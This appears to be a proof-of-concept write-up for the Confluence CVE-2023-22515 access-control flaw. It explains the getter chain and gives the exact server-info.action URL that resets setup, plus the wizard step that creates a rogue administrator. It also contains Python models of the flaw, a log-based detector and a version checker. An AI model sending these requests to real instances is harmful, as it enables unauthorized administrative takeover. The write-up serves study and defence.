POC details: c2001391637dda894d2ba8003f08c2ea53c424b7

Related vulnerability
Title: Atlassian Confluence Server security vulnerability (CVE-2023-22515)
Description: Atlassian Confluence Server is the server edition of collaboration software from the Australian company Atlassian that provides enterprise knowledge management and supports building enterprise wikis. Atlassian Confluence Server contains a security vulnerability: an external attacker can abuse a publicly accessible Confluence Data Center or Confluence Server instance through a then-unknown flaw to create a Confluence administrator account and gain access to the instance.
Description
Server Broken Access Control in Confluence - CVE-2023-22515
Introduction
# Confluence Vulnerability - CVE-2023-22515 :notebook:

### Introduction

Atlassian was informed of a vulnerability that could be exploited to compromise the environment through administrative access. On October 4, 2023, Atlassian released a security advisory for CVE-2023-22515, which carries a CVSS score of 10.0. The vulnerability was introduced in version 8.0.0 of **Confluence Server** and **Data Center** and is present in versions **<8.3.3, <8.4.3, <8.5.2** (so every 8.0.x, 8.1.x and 8.2.x release is affected, as those branches have no fixed release). Confluence Cloud sites are not affected.

An attacker can exploit the vulnerability to create an additional Confluence account with full administrative privileges, without any prior information or credentials. The vulnerability is believed to enable other, as yet unknown, attack vectors and should be patched as soon as possible.

<p align="center">
  <img width="800" height="200" src="./img/1.jpg">
</p>

## Explaining the Exploitation :warning:

With this vulnerability, the attacker can send Confluence back to the setup stage of its configuration and, from there, create a new user with administrative access. This is possible because Confluence is built on the Apache Struts framework, which depends on the XWork package. XWork lets you define Actions as Java classes. Each Action can be invoked through a URL; the corresponding Java class handles the request, does whatever the Action requires, and emits a response. XWork also maps request parameters onto the Action's properties, and a dotted parameter name is resolved as a chain of getters ending in a setter.

The problem is that one such Action class exposes, through its inherited getters, an object whose setters should never be reachable from a URL.

- **Chaining Getters/Setters to Reenable the Initial Setup**

The exploitation goes through the ```ServerInfoAction``` action, where we can walk the class's getters to a setter that resets the setup state.

If you analyse the code of the ```ServerInfoAction``` class, you'll see it extends the ```ConfluenceActionSupport``` class and therefore inherits all of its methods. One such method is a getter that returns a BootstrapStatusProvider object:

```
public class ConfluenceActionSupport extends ActionSupport implements LocaleProvider, WebInterface, MessageHolderAware {
  public BootstrapStatusProvider getBootstrapStatusProvider() {
    if (this.bootstrapStatusProvider == null)
      this.bootstrapStatusProvider = BootstrapStatusProviderImpl.getInstance(); 
    return this.bootstrapStatusProvider;
  }
}
```
We care about the BootstrapStatusProvider because the returned implementation has another getter we can use to retrieve an ApplicationConfiguration object:

```
public class BootstrapStatusProviderImpl implements BootstrapStatusProvider, BootstrapManagerInternal {
  public ApplicationConfiguration getApplicationConfig() {
    return this.delegate.getApplicationConfig();
  }
}
```
This object holds the application's configuration, including the flag that tells Confluence whether the initial setup has been completed. That flag can be modified through a setter in the ApplicationConfig class:

```
public class ApplicationConfig implements ApplicationConfiguration {
  public synchronized void setSetupComplete(boolean setupComplete) {
    this.setupComplete = setupComplete;
  }  
}
```
If we can call setSetupComplete(false), we reset the setup process. The XWork parameter mapping lets us do exactly that with a single URL parameter whose dotted name follows the getter chain:

```
http://10.10.227.86:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```
This URL walks the chain of methods described above and ends at the setter responsible for resetting the setup:
```
getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false)
```
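To make the chain concrete, here is a small Python model of how an XWork-style parameter interceptor resolves a dotted parameter name into getter calls and a final setter call. This is an added example, not Confluence or XWork code: the class and method names mirror the ones quoted above, but the bodies are stand-ins, and the `allowed_prefixes` guard is a generic mitigation added for illustration, not a description of Atlassian's actual patch.

```python
"""Toy model of XWork-style parameter mapping: 'a.b.c=v' becomes
action.getA().getB().setC(v). Added example; the classes below are
stand-ins named after the Confluence classes quoted above."""


class ApplicationConfig:
    """Stand-in for com.atlassian.config.ApplicationConfig."""

    def __init__(self):
        self.setupComplete = True  # a finished installation

    def setSetupComplete(self, value: bool):
        self.setupComplete = value


class BootstrapStatusProviderImpl:
    """Stand-in for the provider that hands out the application config."""

    def __init__(self, config: ApplicationConfig):
        self._config = config

    def getApplicationConfig(self) -> ApplicationConfig:
        return self._config


class ServerInfoAction:
    """Stand-in for ServerInfoAction; the getter is inherited in real code."""

    def __init__(self, provider: BootstrapStatusProviderImpl):
        self._provider = provider

    def getBootstrapStatusProvider(self) -> BootstrapStatusProviderImpl:
        return self._provider


def coerce(raw: str):
    """Minimal type conversion, as the framework does for boolean setters."""
    if raw.lower() in ("true", "false"):
        return raw.lower() == "true"
    return raw


def apply_parameter(action, name: str, raw_value: str, allowed_prefixes=None):
    """Resolve a dotted parameter name through getters and call the setter.

    With allowed_prefixes set, any name outside the allowed property tree is
    refused before traversal starts (hypothetical hardening, not Atlassian's fix).
    """
    if allowed_prefixes is not None and not any(
        name == p or name.startswith(p + ".") for p in allowed_prefixes
    ):
        raise PermissionError(f"parameter {name!r} is not an allowed action property")
    *path, last = name.split(".")
    target = action
    for segment in path:                      # getA().getB()...
        getter = "get" + segment[0].upper() + segment[1:]
        target = getattr(target, getter)()
    setter = "set" + last[0].upper() + last[1:]  # ...setC(v)
    getattr(target, setter)(coerce(raw_value))
    return target


def build_action() -> ServerInfoAction:
    return ServerInfoAction(BootstrapStatusProviderImpl(ApplicationConfig()))


def demo_reset() -> bool:
    """Unrestricted mapping: the single parameter flips setupComplete to False."""
    action = build_action()
    apply_parameter(action, "bootstrapStatusProvider.applicationConfig.setupComplete", "false")
    return action.getBootstrapStatusProvider().getApplicationConfig().setupComplete


def demo_blocked() -> bool:
    """With an allowlist of real action properties, the traversal is refused."""
    action = build_action()
    try:
        apply_parameter(
            action,
            "bootstrapStatusProvider.applicationConfig.setupComplete",
            "false",
            allowed_prefixes=["pageSize"],  # hypothetical legitimate property
        )
    except PermissionError:
        pass
    return action.getBootstrapStatusProvider().getApplicationConfig().setupComplete


if __name__ == "__main__":
    print("setupComplete after unrestricted mapping:", demo_reset())
    print("setupComplete after allowlisted mapping:", demo_blocked())
```

The point of the model is that the attacker never needs a dedicated endpoint: any getter reachable from the Action object becomes a path into objects that were never meant to be writable from a request, which is why the parameter name alone is enough to drive the setter.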
## Hands On :writing_hand:
Below is a server running a vulnerable version of Confluence.

<p align="center">
  <img width="1000" height="400" src="./img/2.jpg">
</p>

Let's try to restart the setup process with the parameter chain explained above:
```
http://atlassian.poc:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```
After setting setupComplete to false, the server responds with success, which means the change was applied.

<p align="center">
  <img width="900" height="180" src="./img/3.jpg">
</p>

- **Creating new administrative account** :fire:

With the setup flag reset, the administrator-creation step of the setup wizard is reachable again:
```
http://atlassian.poc:8090/setup/setupadministrator-start.action
```
<p align="center">
  <img width="900" height="400" src="./img/4.jpg">
</p>

- Done! :heavy_check_mark:

We were able to reset the setup process and create a new user with administrative access.

<p align="center">
  <img width="900" height="500" src="./img/5.jpg">
</p>
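The two requests above leave a distinctive trail in the access log, so here is an added detection example (not part of the original README) that scans combined-format access-log lines for the setup-reset parameter and for any hit on the setup wizard, then correlates the two per source IP. The log lines are constructed for the example; status codes and user agents are made up, and matching the parameter name on any `.action` path rather than only `server-info.action` is this example's assumption, based on the getter being inherited from ConfluenceActionSupport.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in combined-log style (not real traffic). Only
# the request paths and the parameter name come from the walkthrough above.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Oct/2023:10:12:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [05/Oct/2023:10:12:03 +0000] "GET /setup/setupadministrator-start.action HTTP/1.1" 200 5120 "-" "python-requests/2.31"
198.51.100.9 - - [05/Oct/2023:10:13:10 +0000] "GET /server-info.action?bootstrapStatusProvider%2EapplicationConfig%2EsetupComplete=false HTTP/1.1" 200 512 "-" "curl/8.1"
10.0.0.5 - alice [05/Oct/2023:10:15:00 +0000] "GET /server-info.action HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.6 - bob [05/Oct/2023:10:16:00 +0000] "GET /display/DOCS/Home HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str):
    """Split one combined-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(target: str):
    """Return a rule name for a request target, or None if it looks benign."""
    parts = urlsplit(target)
    # parse_qs percent-decodes parameter names, so %2E-obfuscated dots still match.
    params = parse_qs(parts.query, keep_blank_values=True)
    # Rule 1: a parameter name that traverses bootstrapStatusProvider or ends in
    # setupComplete. Matched on the name alone, on any path (assumption).
    for key in params:
        if "bootstrapStatusProvider" in key or key.endswith("setupComplete"):
            return "setup-reset-attempt"
    # Rule 2: the setup wizard should be unreachable once installation is done.
    if parts.path.startswith("/setup/"):
        return "setup-wizard-access"
    return None


def detect(log_text: str):
    """Run both rules over every line and collect the hits."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        rule = classify(rec["target"])
        if rule:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "rule": rule, "target": rec["target"]})
    return findings


def high_confidence_sources(findings):
    """IPs that both reset the setup flag and then reached the setup wizard."""
    rules_by_ip = {}
    for f in findings:
        rules_by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return sorted(ip for ip, rules in rules_by_ip.items()
                  if {"setup-reset-attempt", "setup-wizard-access"} <= rules)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']}  {f['ip']:<14} {f['rule']:<22} {f['target']}")
    print("high-confidence sources:", high_confidence_sources(found))
```

A lone hit on rule 1 is already worth an alert on an installed instance, because there is no legitimate reason for a client to send that parameter; the correlation step is there to rank sources that went on to the wizard, and a reverse proxy in front of Confluence would need the same rules applied to its own log.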

## Patching :white_check_mark:

The vulnerability has been fixed in versions **8.3.3, 8.4.3 and 8.5.2**, and any newer version branch is safe as well. Instances on 8.0.x, 8.1.x or 8.2.x have no fixed release in their own branch and must upgrade to one of the fixed versions. If an instance was exposed while vulnerable, patching alone is not enough: review the user directory for unexpected administrator accounts and check whether the setup state was reset.
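For an inventory sweep, the version statements above translate into a small check. This is an added example, not from the README or from Atlassian; the branch logic follows only what is stated here (introduced in 8.0.0, fixed in 8.3.3, 8.4.3 and 8.5.2, later branches safe), and the host inventory is constructed.

```python
import re

# Version facts as stated above: introduced in 8.0.0, fixed in 8.3.3, 8.4.3
# and 8.5.2, every later branch shipped with the fix. Branches 8.0, 8.1 and
# 8.2 have no fixed release, so all of their versions count as affected.
FIRST_AFFECTED = (8, 0, 0)
FIXED_IN = {(8, 3): (8, 3, 3), (8, 4): (8, 4, 3), (8, 5): (8, 5, 2)}
FIRST_SAFE_BRANCH = (8, 6)

VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?")

# Constructed inventory for the demo (hypothetical hosts).
SAMPLE_INVENTORY = {
    "wiki-prod": "8.5.1",
    "wiki-stage": "8.5.2",
    "wiki-legacy": "7.19.14",
    "wiki-dev": "8.2.3",
}


def parse_version(text: str):
    """'8.5.1', '8.5' or '8.5.1-suffix' -> (8, 5, 1); None if unparseable."""
    m = VERSION_RE.match(text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(version_text: str) -> bool:
    """True if this Confluence Server/Data Center version carries CVE-2023-22515."""
    v = parse_version(version_text)
    if v is None:
        raise ValueError(f"unrecognised Confluence version: {version_text!r}")
    if v < FIRST_AFFECTED or v[:2] >= FIRST_SAFE_BRANCH:
        return False
    fixed = FIXED_IN.get(v[:2])
    # Branch without a fixed release: every version in it is affected.
    return True if fixed is None else v < fixed


def triage(inventory: dict) -> list:
    """Given host -> version, return the hosts that still need the upgrade."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))


if __name__ == "__main__":
    for host, ver in SAMPLE_INVENTORY.items():
        print(f"{host:<12} {ver:<8} {'AFFECTED' if is_affected(ver) else 'ok'}")
    print("upgrade needed:", triage(SAMPLE_INVENTORY))
```

The check only answers "is the installed version vulnerable"; it says nothing about whether the instance was reachable from the internet while it was, which is the question the post-patch review above has to answer.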

For more details, see Atlassian's advisory for this vulnerability ([CVE-2023-22515 - Atlassian](https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html)).
File snapshot

```
[4.0K] /data/pocs/c2001391637dda894d2ba8003f08c2ea53c424b7
├── [4.0K] img
│   ├── [161K] 1.jpg
│   ├── [ 30K] 2.jpg
│   ├── [ 21K] 3.jpg
│   ├── [ 53K] 4.jpg
│   └── [ 75K] 5.jpg
└── [5.0K] README.md

1 directory, 6 files
```